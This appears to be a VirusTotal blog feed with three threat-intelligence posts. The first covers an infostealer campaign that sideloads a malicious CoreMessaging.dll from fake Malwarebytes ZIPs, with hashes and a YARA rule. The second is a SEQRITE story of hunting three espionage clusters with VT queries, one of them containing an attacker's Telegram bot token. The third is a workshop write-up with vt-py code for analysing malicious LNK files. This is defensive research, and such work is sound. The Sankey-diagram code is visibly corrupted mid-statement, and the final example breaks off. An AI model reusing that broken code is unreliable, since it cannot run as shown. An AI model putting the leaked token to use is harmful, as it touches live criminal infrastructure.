New Infostealer Campaign Targets Users via Spoofed Software Installers

Introduction

As part of our commitment to sharing interesting hunts, we are launching these ‘Flash Hunting Findings’ to highlight active threats. Our latest investigation tracks an operation active between January 11 and January 15, 2026, which uses consistent ZIP file structures and a unique behash (“4acaac53c8340a8c236c91e68244e6cb”) for identification. The campaign relies on a trusted executable to trick the operating system into loading a malicious payload, leading to the execution of secondary-stage infostealers.

Findings

The primary samples identified are ZIP files that mostly reference the MalwareBytes company and software using the filename malwarebytes-windows-github-io-X.X.X.zip. A notable feature for identification is that all of them share the same behash.
behash:"4acaac53c8340a8c236c91e68244e6cb"
The initial instance of these samples was identified on January 11, 2026, with the most recent occurrence recorded on January 14.
All of these ZIP archives share a nearly identical internal structure, containing the same set of files across the different versions identified. Of particular importance is the DLL file, which serves as the initial malicious payload, and a specific TXT file found in each archive. This text file has been observed on VirusTotal under two distinct filenames: gitconfig.com.txt and Agreement_About.txt.
The content of the TXT file holds no significant importance for the intrusion itself, as it merely contains a single string consisting of a GitHub URL.
However, this TXT is particularly valuable for pivoting and infrastructure mapping. By examining its “execution parents,” analysts can identify additional ZIP archives that are likely linked to the same malicious campaign. These related files can be efficiently retrieved for further investigation using the following VirusTotal API v3 endpoint:
/api/v3/files/09a8b930c8b79e7c313e5e741e1d59c39ae91bc1f10cdefa68b47bf77519be57/execution_parents
The primary payload of this campaign is contained within a malicious DLL named CoreMessaging.dll. Threat actors are utilizing a technique known as DLL Sideloading to execute this code. This involves placing the malicious DLL in the same directory as a legitimate, trusted executable (EXE) also found within the distributed ZIP file. When an analyst or user runs the legitimate EXE, the operating system is tricked into loading the malicious CoreMessaging.dll.
The identified DLLs exhibit distinctive metadata characteristics that are highly effective for pivoting and uncovering additional variants within the same campaign. Security analysts can utilize specific hunting queries to track down other malicious DLLs belonging to this activity. For instance, analysts can search for samples sharing the following unique signature strings found in the file metadata:
signature:"Peastaking plenipotence ductileness chilopodous codicillary."
signature:"© 2026 Eosinophil LLC"
Furthermore, the exported functions within these DLLs contains unusual alphanumeric strings. These exports serve as reliable indicators for identifying related malicious components across different stages of the campaign:
exports:15Mmm95ml1RbfjH1VUyelYFCf exports:2dlSKEtPzvo1mHDN4FYgv
Finally, another observation for behavioral analysis can be found in the relations tab of the ZIP files. These files document the full infection chain observed during sandbox execution, where the sandbox extracts the ZIP, runs the legitimate EXE, and subsequently triggers the loading of the malicious DLL. Within the Payload Files section, additional payloads are visible. These represent secondary stages dropped during the initial DLL execution, which act as the final malware samples. These final payloads are primarily identified as infostealers, designed to exfiltrate sensitive data.
Analysis of all the ZIP files behavioral relations reveals a recurring payload file consistently flagged as an infostealer. This malicious component is identified by various YARA rules, including those specifically designed to detect signatures associated with stealing cryptocurrency wallet browser extension IDs among others.
To identify and pivot through the various secondary-stage payloads dropped during this campaign, analysts can utilize a specific behash identifier. These files represent the final infection stage and are primarily designed to exfiltrate credentials and crypto-wallet information. The following behash provides a reliable pivot point for uncovering additional variants.
behash:5ddb604194329c1f182d7ba74f6f5946

IOCs

We have created a public VirusTotal Collection to share all the IOCs in an easy and free way. Below you can find the main IOCs related to the ZIP files and DLLs too.
import "pe"

rule win_dll_sideload_eosinophil_infostealer_jan26
{
  meta:
    author = "VirusTotal"
    description = "Detects malicious DLLs (CoreMessaging.dll) from an infostealer campaign impersonating Malwarebytes, Logitech, and others via DLL sideloading."
    reference = "https://blog.virustotal.com/2026/01/malicious-infostealer-january-26.html"
    date = "2026-01-16"
    behash = "4acaac53c8340a8c236c91e68244e6cb"
    target_entity = "file"
    hash = "606baa263e87d32a64a9b191fc7e96ca066708b2f003bde35391908d3311a463"
  condition:
    (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and pe.is_dll()) and
    pe.exports("15Mmm95ml1RbfjH1VUyelYFCf") and pe.exports("2dlSKEtPzvo1mHDN4FYgv")
}
sha256 description
6773af31bd7891852c3d8170085dd4bf2d68ea24a165e4b604d777bd083caeaa malwarebytes-windows-github-io-X.X.X.zip
4294d6e8f1a63b88c473fce71b665bbc713e3ee88d95f286e058f1a37d4162be malwarebytes-windows-github-io-X.X.X.zip
5591156d120934f19f2bb92d9f9b1b32cb022134befef9b63c2191460be36899 malwarebytes-windows-github-io-X.X.X.zip
42d53bf0ed5880616aa995cad357d27e102fb66b2fca89b17f92709b38706706 malwarebytes-windows-github-io-X.X.X.zip
5aa6f4a57fb86759bbcc9fc6c61b5f74c0ca74604a22084f9e0310840aa73664 malwarebytes-windows-github-io-X.X.X.zip
84021dcfad522a75bf00a07e6b5cb4e17063bd715a877ed01ba5d1631cd3ad71 malwarebytes-windows-github-io-X.X.X.zip
ca8467ae9527ed908e9478c3f0891c52c0266577ca59e4c80a029c256c1d4fce malwarebytes-windows-github-io-X.X.X.zip
9619331ef9ff6b2d40e77a67ec86fc81b050eeb96c4b5f735eb9472c54da6735 malwarebytes-windows-github-io-X.X.X.zip
a2842c7cfaadfba90b29e0b9873a592dd5dbea0ef78883d240baf3ee2d5670c5 malwarebytes-windows-github-io-X.X.X.zip
4705fd47bf0617b60baef8401c47d21afb3796666092ce40fbb7fe51782ae280 malwarebytes-windows-github-io-X.X.X.zip
580d37fc9d9cc95dc615d41fa2272f8e86c9b4da2988a336a8b3a3f90f4363c2 malwarebytes-windows-github-io-X.X.X.zip
d47fd17d1d82ea61d850ccc2af3bee54adce6975d762fb4dee8f4006692c5ef7 malwarebytes-windows-github-io-X.X.X.zip
606baa263e87d32a64a9b191fc7e96ca066708b2f003bde35391908d3311a463 CoreMessaging.dll DLL loaded by DLL SideLoading
fd855aa20467708d004d4aab5203dd5ecdf4db2b3cb2ed7e83c27368368f02bb CoreMessaging.dll DLL loaded by DLL SideLoading
a0687834ce9cb8a40b2bb30b18322298aff74147771896787609afad9016f4ea CoreMessaging.dll DLL loaded by DLL SideLoading
4235732440506e626fd4d0fffad85700a8fcf3e83ba5c5bc8e19ada508a6498e CoreMessaging.dll DLL loaded by DLL SideLoading
cd1fe2762acf3fb0784b17e23e1751ca9e81a6c0518c6be4729e2bc369040ca5 CoreMessaging.dll DLL loaded by DLL SideLoading
f798c24a688d7858efd6efeaa8641822ad269feeb3a74962c2f7c523cf8563ff CoreMessaging.dll DLL loaded by DLL SideLoading
0698a2c6401059a3979d931b84d2d4b011d38566f20558ee7950a8bf475a6959 CoreMessaging.dll DLL loaded by DLL SideLoading
1b3bee041f2fffcb9c216522afa67791d4c658f257705e0feccc7573489ec06f CoreMessaging.dll DLL loaded by DLL SideLoading
231c05f4db4027c131259d1acf940e87e15261bb8cb443c7521294512154379b CoreMessaging.dll DLL loaded by DLL SideLoading
ec2e30d8e5cacecdf26c713e3ee3a45ebc512059a64ba4062b20ca8bec2eb9e7 CoreMessaging.dll DLL loaded by DLL SideLoading
58bd2e6932270921028ab54e5ff4b0dbd1bf67424d4a5d83883c429cadeef662 CoreMessaging.dll DLL loaded by DLL SideLoading
57ed35e6d2f2d0c9bbc3f17ce2c94946cc857809f4ab5c53d7cb04a4e48c8b14 CoreMessaging.dll DLL loaded by DLL SideLoading
cfcf3d248100228905ad1e8c5849bf44757dd490a0b323a10938449946eabeee CoreMessaging.dll DLL loaded by DLL SideLoading
f02be238d14f8e248ad9516a896da7f49933adc7b36db7f52a7e12d1c2ddc6af CoreMessaging.dll DLL loaded by DLL SideLoading
f60802c7bec15da6d84d03aad3457e76c5760e4556db7c2212f08e3301dc0d92 CoreMessaging.dll DLL loaded by DLL SideLoading
02dc9217f870790b96e1069acd381ae58c2335b15af32310f38198b5ee10b158 CoreMessaging.dll DLL loaded by DLL SideLoading
f9549e382faf0033b12298b4fd7cd10e86c680fe93f7af99291b75fd3d0c9842 CoreMessaging.dll DLL loaded by DLL SideLoading
92f4d95938789a69e0343b98240109934c0502f73d8b6c04e8ee856f606015c8 CoreMessaging.dll DLL loaded by DLL SideLoading
66fba00b3496d61ca43ec3eae02527eb5222892186c8223b9802060a932a5a7a CoreMessaging.dll DLL loaded by DLL SideLoading
e5dd464a2c90a8c965db655906d0dc84a9ac84701a13267d3d0c89a3c97e1e9b CoreMessaging.dll DLL loaded by DLL SideLoading
35211074b59417dd5a205618fed3402d4ac9ca419374ff2d7349e70a3a462a15 CoreMessaging.dll DLL loaded by DLL SideLoading
6863b4906e0bd4961369b8784b968b443f745869dbe19c6d97e2287837849385 CoreMessaging.dll DLL loaded by DLL SideLoading
a83c478f075a3623da5684c52993293d38ecaa17f4a1ddca10f95335865ef1e2 CoreMessaging.dll DLL loaded by DLL SideLoading
43e2936e4a97d9bc43b423841b137fde1dd5b2f291abf20d3ba57b8f198d9fab CoreMessaging.dll DLL loaded by DLL SideLoading
f001ae3318ba29a3b663d72b5375d10da5207163c6b2746cfae9e46a37d975cf CoreMessaging.dll DLL loaded by DLL SideLoading
c67403d3b6e7750222f20fa97daa3c05a9a8cce39db16455e196cd81d087b54d CoreMessaging.dll DLL loaded by DLL SideLoading
5ee9d4636b01fd3a35bd8e3dce86a8c114d8b0aa6b68b1d26ace7ef0f85b438a Payload dropped by one of the malicious DLLs
e84b0dadb0b6be9b00a063ed82c8ddba06a2bd13f07d510d14e6fd73cd613fba Payload dropped by one of the malicious DLLs

Continue reading New Infostealer Campaign Targets Users via Spoofed Software Installers

VTPRACTITIONERS{ACRONIS}: Tracking FileFix, Shadow Vector, and SideWinder

Introduction
We have recently started a new blog series called #VTPRACTITIONERS. This series aims to share with the community what other practitioners are able to research using VirusTotal from a technical point of view.

Our first blog saw our colle… Continue reading VTPRACTITIONERS{ACRONIS}: Tracking FileFix, Shadow Vector, and SideWinder

VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone

Introduction

One of the best parts of being at VirusTotal (VT) is seeing all the amazing ways our community uses our tools to hunt down threats. We love hearing about your successes, and we think the rest of the community would too.
That’s why we’re so excited to start a new blog series where we’ll be sharing success stories from some of our customers. They’ll be giving us a behind-the-scenes look at how they pivot from an initial clue to uncover entire campaigns.

To
kick things off, we’re thrilled to have our friends from SEQRITE
join us. Their
APT-Team
is full of incredible threat hunters, and they’ve got a great story to share about how they’ve used VT to
track some sophisticated actors.

How VT plays a role in hunting for analysts

For a threat analyst, the hunt often begins with a single, seemingly isolated clue—a suspicious file, a strange domain, or an odd IP address. The challenge is to connect that one piece of the puzzle to the larger picture. This is where VT truly shines.

VT is more than just a tool for checking if a file is malicious. It’s a massive, living database of digital artifacts (process activity, registry key activity, memory dumps, LLM verdicts, among others) and their relationships. It allows analysts to pivot from one indicator of compromise to another, uncovering hidden connections and mapping out entire attack campaigns. It’s this ability to connect the dots—to see how a piece of malware communicates with a C2 server, what other files are associated with it, what processes were launched or files were used to set persistence or exfiltrate information, and who else has seen it—that transforms a simple file check into a full-blown investigation. The following story from SEQRITE is a perfect example of this process in action.

Seqrite – Success Story

[In the words of SEQRITE…]
We at SEQRITE APT-Team perform a lot of activities, including threat hunting and threat intelligence, using customer telemetry and multiple other data corpuses. Without an iota of doubt, apart from our customer telemetry, the VT corpus has aided us a decent amount in converting our research, which includes hunting unique campaigns and multiple pivots that have led us to an interesting set of campaigns, ranging across multiple spheres of Asian geography, including Central, South, and East Asia.

UNG0002

SEQRITE
APT-Team have been tracking a south-east asian threat entity, which was termed as UNG0002,
using certain behavioral artefacts, such using similar OPSEC mistakes across multiple campaigns and using
similar set of decoys and post-exploitation toolkit across multiple operational campaigns ranging from May
2024 to May 2025.
During
the initial
phase

of this campaign, the threat actor performed multiple targets across Hong Kong and Pakistan against
sectors involving defence, electrotechnical, medical science, academia and much more.
VT corpus has helped us to pivot through Cobalt Strike oriented beacons, which were used by this threat actor to target various sectors. In our hunt for malicious activity, we discovered a series of Cobalt Strike beacons. These were all delivered through similar ZIP files, which acted as lures. Each ZIP archive contained the same set of file types: a malicious executable, along with LNK, VBS, and PDF decoy files. The beacons themselves were also similar, sharing configurations, filenames and compilation timestamps.

Using
the timestamps from the malicious executables and the filenames previously mentioned, we discovered up to 14
different samples
, all of them related to the campaign with this query
VirusTotal query: metadata:”2015:07:10 03:27:31+00:00″ filename:”imebroker.exe”

based on the configuration extracted by VT, we could use the public key extracted to identify more samples
using exactly the same with the following query
malware_config:30819f300d06092a864886f70d010101050003818d003081890281810096cc4e6ad9aee91ca69b7b44465e17412626a11c7855b7a69daad00f48c0ea98f0e389a0a1c4b74332bf0d603a6e53e05ee734c9a289ff172204bfc9430ed4d6041402d02b526e902b95f6f219598cb1b6391403fa627ab36dbe88646620369e7ec89bdc31f1a2b0bedba1852d5e7656d3b297f9d39f357816f0677563bc496b020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Besides
these executables, we mentioned that there were also LNK
files within the ZIP files. After analyzing them, a consistent LNK-ID metadata revealed the same identifiers
across many samples.
Querying
VT for those LNK-IDs exposed we could identify new files related to the campaign.
VirusTotal query: metadata:”laptop-g5qalv96″

Decoy documents identified within the ZIP files mentioned above

We initially tracked several campaigns leveraging LNK-based device IDs and Cobalt Strike beacons. However, an intriguing shift began to emerge in the September-October activity. We observed a new set of campaigns that frequently used CV-themed decoys, often impersonating students from prominent Chinese research institutions.

While the spear-phishing tactics remained similar, the final execution changed. The threat actors dropped their Cobalt Strike beacons and pivoted toward DLL-Sideloading for their payloads, all while keeping the same decoy theme. This significant change in technique led us to identify a second major wave of this activity, which we’re officially labeling Operation AmberMist.

Tracking this second wave of operations attributed to the UNG0002 cluster, we observed a recurring behavioral artifact: the use of academia-themed lures targeting victims in China and Hong Kong.

Across these campaigns, multiple queries were leveraged, but a consistent pattern emerged—heavy reliance on LOLBINS such as wscript.exe, cscript.exe, and VBScripts for persistence.

By
developing a simple yet effective hunting query,
we were able to uncover a previously unseen sample not publicly reported:
type:zip AND (metadata:"lnk" AND metadata:".vbs" AND metadata:".pdf") and submitter:HK

VirusTotal query: type:zip AND (metadata:”lnk” AND metadata:”.vbs” AND metadata:”.pdf”) and submitter:HK

Silent Lynx

Another
campaign tracked by the SEQRITE APT-team, named Silent
Lynx
,
targeted multiple sectors including banking. As in the previous described case, thanks to VT we were able to
pivot and identify new samples associated with this campaign.
Initial Discovery and Pivoting
During
the initial phase of this campaign, we discovered a decoy-based
SPECA-related archive
file
targeting Kyrgyzstan around December 2024 – January 2025. The decoy was designed to distract from the real
payload: a malicious C++ implant.
Decoy document identified during our research

Second campaign of Silent Lynx @ Bank of Kyrgyz Republic
Email identified during our reserach

We performed multiple pivots focusing on the implant, starting by analyzing the sample’s metadata and network indicators and functionalities, we found that the threat actor had been using a similar C++ implant, which led us to another campaign targeting the banking sector of Kyrgyzstan related to Silent Lynx too.

Information obtained during the analysis of the C++ implants

Information obtained during the analysis of the C++ implants

We
leveraged VT corpus for deploying multiple Livehunt
rules on multiple junctures, some of the simpler examples are as follows:

  • Looking
    at the usage of encoded Telegram Bot based payload inside the C++ implant.
    Using
    either content or malware_config modifiers when extracted from the config could help us to identify
    new samples.

  • Spawning
    Powershell.exe LOLBIN.

  • VT
    search enablers for checking for malicious email files, if uploaded from Central Asian
    Geosphere.

  • ISO-oriented
    first-stagers.

  • Multiple
    behavioral overlaps between YoroTrooper & Silent Lynx and further hunting hypothesis developed
    by us. 

Leveraging VT corpus and using further pivots on the above metrics and many others included on the malicious spear-phishing email, we also tracked some further campaigns. Most importantly, we developed a new YARA rule and a new hypothesis every time to hunt for similar implants leveraging the Livehunt feature depending on the tailored specifications and the raw data we received during hunting keeping in mind the cases of false positives and false negatives.

Decoy document identified during our hunting activities

Submissions identified in the decoy document

The
threat actor repeatedly used the same implant across multiple campaigns in Uzbekistan
and
Turkmenistan.
Using hunting
queries
through VT along with submitter:UZ or submitter:TM helped us to identify these samples.
The
most important pivot
in our investigation was the malware sample itself as shown in the previous screenshots was the usage of
encoded
PowerShell blob
spawning powershell.exe,
which was used multiple times across different campaigns. This sample acted as a key indicator, allowing us
to uncover other campaigns targeting critical sectors in the region, and confirmed the repetitive nature of
the actor’s operations.
Also,
thanks to VT feature of collections,
we further leveraged it to build an attribution of the threat entity.
Collections used during the attribution process

DragonClone

Finally,
the last campaign that we wanted to illustrate how pivoting within the VT ecosystem enabled our team to
uncover new samples
was by a group we named DRAGONCLONE
The SEQRITE APT Team has been monitoring DRAGONCLONE as they actively target critical sectors across Asia and the globe. They utilize sophisticated methods for cyber-espionage, compromising strategic organizations in sectors like telecom and energy through the deployment of custom malware implants, the exploitation of unpatched vulnerabilities, and extensive spear-phishing.

Initial Discovery
Recently,
on 13th
May
,
our team discovered a
malicious
ZIP
file

that surfaced across various sources, including VT. The ZIP file was used as a preliminary infection vector
and contained multiple EXE and DLL files inside the archive, like
this
one

which contains the malicious payload.
Chinese-based
threat actors have a well-known tendency to deliver DLL
sideloading implants

as part of their infection chains. Leveraging
crowdsourced
Sigma rules in VT
,
along with personal hunting techniques using static
YARA
signatures
,
we were able to track and hunt this malicious spear-phishing attachment effectively. In their public
Sigma
Rules list

you can find different Sigma Rules that are created to identify DLL SideLoading.
Pivoting Certificates via VT Corpus
While
exploring the network of related artifacts, we could not initially find any direct commonalities. However, a
particular clean-looking executable
named “2025 China Mobile Tietong Co., Ltd. Internal Training Program” raised our concern. Its naming and
metadata suggested potential masquerading behavior, making it a critical pivot point that required deeper
investigation.
Certificates
are one of the most key indicators, while looking into malicious artefacts, we saw that it is a fresh and
clean copy of WonderShare’s Repairit Software, a well known software for repairing corrupted files, whereas
a suspicious concern is that it has been signed by ShenZhen
Thunder NetWorking Technologies Ltd
VirusTotal query: signature:”ShenZhen Thunder Networking Technologies Ltd.”

Using this hunch, we discovered and hunted for executables, which have been signed by similar and found there have been multiple malicious binaries, although, this has not been the only indicator or pivot, but a key one, to research for further ones.

Pivoting on Malware Configs via VT Corpus
We analyzed the loader and determined it’s slightly advanced, performing complex tasks like anti-debugging. More significantly, it drops V-Shell, a post-exploitation toolkit. V-Shell was originally open-source but later taken down by its authors and has been observed in campaigns by Earth Lamia.

After
extracting the V-Shell shellcode, we discovered an unusual malware configuration property: qwe123qwe.
By leveraging the VT corpus to
pivot
on this finding, we were able to identify additional V-Shell implant samples potentially linked to this
campaign.
VirusTotal query: malware_config:”qwe123qwe”

VT Tips (based on the success story)

[In the words of VirusTotal…]
Threat hunting is an art, and a good artist needs the right tools and techniques. In this section, we’ll share some practical tips for pivoting and hunting within the VirusTotal ecosystem, inspired by the techniques used in the campaigns discussed in this blog post.

Hunt by Malware Configuration

Many malware families use configuration files to store C2 information, encryption keys, and other operational data. For some malware families, VirusTotal automatically extracts these configurations. You can use unique values from these configurations to find other samples from the same campaign.

For instance, in the DRAGONCLONE investigation, the V-Shell implant had an unusual malware configuration property: qwe123qwe. A simple query like malware_config:”qwe123qwe” in VT can reveal other samples using the same configuration. Similarly, the Cobalt Strike beacons used by UNG0002 had a unique public key in their configuration that could be used for pivoting. That’s thanks to Backscatter. We’ve written blogs showing how to do advanced hunting using only the malware_config modifier. Remember that you can search for samples by family name like malware_config:”redline” up to Telegram tokens and even URLs configured in the malware configuration like malware_config:”https://steamcommunity.com/profiles/76561198780612393″.

Don’t Overlook LNK File Metadata

Threat actors often make operational security (OPSEC) mistakes. One common mistake is failing to remove metadata from files, including LNK (shortcut) files. This metadata can reveal information about the attacker’s machine, such as the hostname.

In the UNG0002 campaign, the actor consistently used LNK files with the same metadata, specifically the machine identifier laptop-g5qalv96. We know that this information can be also modified by them to deceive security researchers, but often we observe good information that can be used to track them. This allowed the SEQRITE team to uncover a wider set of samples by querying VirusTotal for this metadata string.

Track Actors via Leaked Bot Tokens

Some malware, especially those using public platforms for command and control, will have hardcoded API tokens. As seen in the “Silent Lynx” campaign, a PowerShell script used a hardcoded Telegram bot token for C2 communication and data exfiltration.

These
tokens can be extracted from memory dumps during sandbox execution or from the malware’s code itself. Once
you have a token, you may be able to track the threat actor’s commands and even identify other victims, as
was done in the Silent
Lynx investigation.
A concrete example of using Telegram bot tokens is the query malware_config:”bot7213845603:AAFFyxsyId9av6CCDVB1BCAM5hKLby41Dr8″, which is associated with four infostealer samples uploaded between 2024 and 2025.

Leverage Code-Signing Certificates

Threat actors sometimes sign their malicious executables to make them appear legitimate. They may use stolen certificates or freshly created ones. These certificates can be a powerful pivot point.

In the DRAGONCLONE case, a suspicious executable was signed by “ShenZhen Thunder Networking Technologies Ltd.”. By searching for other files signed with the same certificate (signature:”ShenZhen Thunder Networking Technologies Ltd.”), you can uncover other tools in the attacker’s arsenal.

Utilize YARA and Sigma Rules

For proactive hunting, you can develop your own YARA rules to find malware families based on unique strings, code patterns, or other characteristics. This was a key technique in the “Silent Lynx” campaign for hunting similar implants.

Additionally,
you can leverage the power of the community by using crowdsourced
Sigma rules

in VirusTotal, even
within
your YARA rules
.
These rules can help you identify malicious behaviors, such as the DLL sideloading techniques used by
DRAGONCLONE, directly from sandbox execution data.
For example, If you want to search for the Sigma rule “Potential DLL Sideloading Of MsCorSvc.DLL” in VT files, you can use the query sigma_rule:99b4e5347f2c92e8a7aeac6dc7a4175104a8ba3354e022684bd3780ea9224137 to do so. All the Sigma rules are updated from the public repo and can be consumed here.

Conclusion

The success stories of the SEQRITE APT-Team in tracking campaigns like UNG0002, Silent Lynx, and DRAGONCLONE demonstrate the power of VirusTotal as a collaborative and comprehensive threat intelligence platform. By leveraging a combination of malware configuration analysis, metadata pivoting, and community-driven tools like YARA and Sigma rules, security researchers can effectively uncover and track sophisticated threat actors.

These examples highlight that successful threat hunting is not just about having the right tools, but also about applying creative and persistent investigation techniques. The ability to pivot from one piece of evidence to another is crucial in connecting the dots and revealing the full scope of a campaign. The SEQRITE team has demonstrated a deep understanding of these pivoting techniques, and we appreciate that they have decided to share their valuable insights with the rest of the community.

We hope these tips and stories have been insightful and will help you in your own threat-hunting endeavors. The fight against cybercrime is a collective effort, and the more we share our knowledge and experiences, the stronger we become as a community.

If you have a success story of using VirusTotal that you would like to share with the community, we would be delighted to hear from you. Please reach out to us, and we will be happy to feature your story in a future blog post at practitioners@virustotal.com.

Together, we can make the digital world a safer place.

Continue reading VTPRACTITIONERS{SEQRITE}: Tracking UNG0002, Silent Lynx and DragonClone

Advanced Threat Hunting: Automating Large-Scale Operations with LLMs

Last week, we were fortunate enough to attend the fantastic LABScon conference, organized by the SentinelOne Labs team. While there, we presented a workshop titled ‘Advanced Threat Hunting: Automating Large-Scale Operations with LLMs.’ The main goal of this workshop was to show attendees how they could automate their research using the VirusTotal API and Gemini. Specifically, we demonstrated how to integrate the power of Google Colab to quickly and efficiently generate Jupyter notebooks using natural language.

It goes without saying that the use of LLMs is a must for every analyst today. For this reason, we also want to make life easier for everyone who uses the VirusTotal API for research.

The Power of the VirusTotal API and vt-py

The VirusTotal API is the programmatic gateway to our massive repository of threat intelligence data. While the VirusTotal GUI is great for agile querying, the API unlocks the ability to conduct large-scale, automated investigations and access raw data with more pivoting opportunities.

To make interacting with the API even easier, we recommend using the vt-py library. It simplifies much of the complexity of HTTP requests, JSON parsing, and rate limit management, making it the go-to choice for Python users.

From Natural Language to Actionable Intelligence with Gemini

To bridge the gap between human questions and API queries, we can leverage the integrated Gemini in Google Colab. We have created a “meta Colab” notebook that is pre-populated with working real code snippets for interacting with the VirusTotal API to retrieve different information such as campaigns, threat actors, malware, samples, URLs among others (which we will share soon). This provides Gemini with the necessary context to understand your natural language requests and generate accurate Python code to query the VirusTotal API. Gemini doesn’t call the API directly; it creates the code snippet for you to execute.

For Gemini to generate accurate and relevant code, it needs context. Our meta Colab notebook is filled with examples that act as a guide. For complex questions, it will be nice to provide the exact field names that you want to work with. This context generally falls into two categories:

  1. Reference Documentation: We include detailed documentation directly in the Colab. For example, we provide a comprehensive list of all available file search modifiers for the VirusTotal Intelligence search endpoint. This gives Gemini the “vocabulary” it needs to construct precise queries.
  2. Working Code Examples: The notebook is pre-populated with dozens of working vt-py code snippets for common tasks like retrieving file information, performing an intelligence search, or getting relationships. This gives Gemini the “grammar” and correct patterns for interacting with our API.

Example of code snippet context that we have included in our meta colab:

query_results_with_behaviors = []
query = "have:sigma have:yara have:ids have:malware_config fs:1d+ have:bundled_file tag:overlay"
RELATIONS = "behaviours"

async for itemobj in cli.iterator('/intelligence/search',params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): '\*'},limit=0):
    query_results_with_behaviors.append(itemobj.to_dict())

res_with_behaviors = list(query_results_with_behaviors)

Diagram showing the flow from User's Action to Actionable Intelligence via Gemini and VirusTotal API


Practical Example: Hunting for Malicious LNK Files

One of the exercises in our workshop focused on analyzing malicious LNK files submitted to VirusTotal in a specific period of time to limit results. The goal was to discover common execution techniques and interesting command-line patterns.

Here’s how you could approach this with natural language queries in our meta Colab:

1. Retrieve all LNK file objects matching the criteria.

You can start by asking Gemini:

Create a code snippet to retrieve all LNK files submitted from January 1st, 2025, until April 1st, 2025, with 5 or more positives.

Code generated:

query_results = []

# Query for LNK files submitted between January 1st, 2025, and April 1st, 2025, with 5 or more positives.
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

async for itemobj in cli.iterator('/intelligence/search',params={'query': "%s"%(query)},limit=0):
    query_results.append(itemobj.to_dict())

lnk_files = list(query_results)
print(f"Found {len(lnk_files)} LNK files matching the criteria.")

2. Flatten the data and visualize it.

Next, you can ask Gemini to process the retrieved data and create visualizations:

Flatten the data in a dataframe and create a bar chart depicting the most common TargetFileDOSName values.

Code generated:

import pandas as pd
import plotly.express as px

# Extract the 'attributes' dictionary from each object in our results
attributes_list = [result.get('attributes', {}) for result in lnk_files]

# Use json_normalize to create a flat DataFrame
df_flat = pd.json_normalize(attributes_list)

# Check if 'exiftool.TargetFileDOSName' column exists and is not empty
if 'exiftool.TargetFileDOSName' in df_flat.columns and not df_flat['exiftool.TargetFileDOSName'].empty:
    # Count the occurrences of each TargetFileDOSName
    target_file_counts = df_flat['exiftool.TargetFileDOSName'].value_counts().reset_index()
    target_file_counts.columns = ['TargetFileDOSName', 'Count']

    # Get the top 10 most common TargetFileDOSName values for visualization
    top_target_files = target_file_counts.head(10)

    # Create an interactive bar chart
    fig = px.bar(top_target_files,
                 x='Count',
                 y='TargetFileDOSName',
                 orientation='h',
                 title='Top 10 Most Common TargetFileDOSName in LNK files',
                 labels={'Count': 'Number of Occurrences', 'TargetFileDOSName': 'Target File DOS Name'})
    fig.show()
else:
    print("The 'exiftool.TargetFileDOSName' column was not found or is empty in the flattened data.")

print("DataFrame shape:", df_flat.shape)
df_flat.head()

This will generate a code snippet using pandas and Plotly to give you a clear view of the most frequent target files in the malicious LNKs.

3. Visualize relationships with a Sankey diagram.

To dig deeper and understand the relationships between the infected machines and the malware, you can ask for a more advanced visualization:

Create a Sankey diagram connecting MachineID (source) to TargetFileDOSName (target), with link widths representing the number of occurrences. Include only MachineID values with 10 or more occurrences, grouping the rest as "Other", and make the visualization interactive with hover details.

Code generated:

import plotly.graph_objects as go
import pandas as pd

# Ensure df_flat is available from previous steps
# If not, you might need to re-run the cell that creates df_flat.

# Check if necessary columns exist in df_flat
if 'lnk_info.machine_id' in df_flat.columns and 'exiftool.TargetFileDOSName' in df_flat.columns:

    # Calculate the frequency of each machine ID and target file name pair
    pair_frequencies = df_flat.groupby(['lnk_info.machine_id', 'exiftool.TargetFileDOSName']).size().reset_index(name='frequency')

    # Identify MachineIDs with less than 10 occurrences
    machine_id_counts = pair_frequencies.groupby('lnk_info.machine_id')['frequency'].sum().reset_index(name='count')
    other_machine_ids = machine_id_counts[machine_id_counts['count']  {row['exiftool.TargetFileDOSName']}: {row['frequency']}", axis=1)
        )
    )])

    fig.update_layout(title_text="MachineID to TargetFileDOSName Sankey Diagram (Infrequent MachineIDs grouped as 'Other')", font_size=10)
    fig.show()
else:
    print("Required columns 'lnk_info.machine_id' or 'exiftool.TargetFileDOSName' not found in the DataFrame.")

This will create a powerful visualization that shows how different machines are being targeted with specific files, allowing us identify patterns for each machineID metadata.

Sankey diagram

4. Analyze the behavior of the LNK files.

Finally, you can investigate the behavior of the LNK files themselves, for example, by looking at how they are executed:

Create a pie chart depicting the distribution of window behaviors for LNK target processes (hidden, minimized,...).

Code generated:

import plotly.express as px
import pandas as pd

# Check if the relevant column exists
if 'lnk_info.header.show_window_str' in df_flat.columns and not df_flat['lnk_info.header.show_window_str'].empty:
    # Count the occurrences of each window behavior string
    window_behavior_counts = df_flat['lnk_info.header.show_window_str'].value_counts().reset_index()
    window_behavior_counts.columns = ['Window Behavior', 'Count']

    # Create an interactive pie chart
    fig = px.pie(window_behavior_counts,
                 names='Window Behavior',
                 values='Count',
                 title='Distribution of LNK Target Process Window Behaviors',
                 hover_data={'Count': True})
    fig.show()
else:
    print("The 'lnk_info.header.show_window_str' column was not found or is empty in the flattened data. Cannot create the pie chart.")

Pie chart of window behaviors

This allows you to quickly identify if the LNK files are trying to hide their execution, a common use case for malware.

5. Geographic Threat Mapping of Submissions

Understanding the geographical distribution of malware submissions can provide crucial insights into whether a campaign is widespread or targeting a specific region. By analyzing the submission metadata for our set of LNK files, an analyst can quickly identify potential hotspots, which could indicate a geographically focused attack. This is achieved by fetching the submissions relationship for each file, extracting the country of origin for each submission, and plotting this data on a world map (please note that submissions doesn’t mean targeted countries, but in some cases could be related).

Using the LNK files identified previously, create a code snippet that retrieves the submissions relationship for each file. Then, count the number of submissions from each country and display the results on a choropleth world map to visualize the submission hotspots.

In this case, Gemini uses the step-by-step execution, which basically is a set of consecutive executions. The code generated was:

Step 1
query_results_with_submissions = []

# Define the search query string for LNK files
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

# Define the relationship to request
RELATIONS = "submissions"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

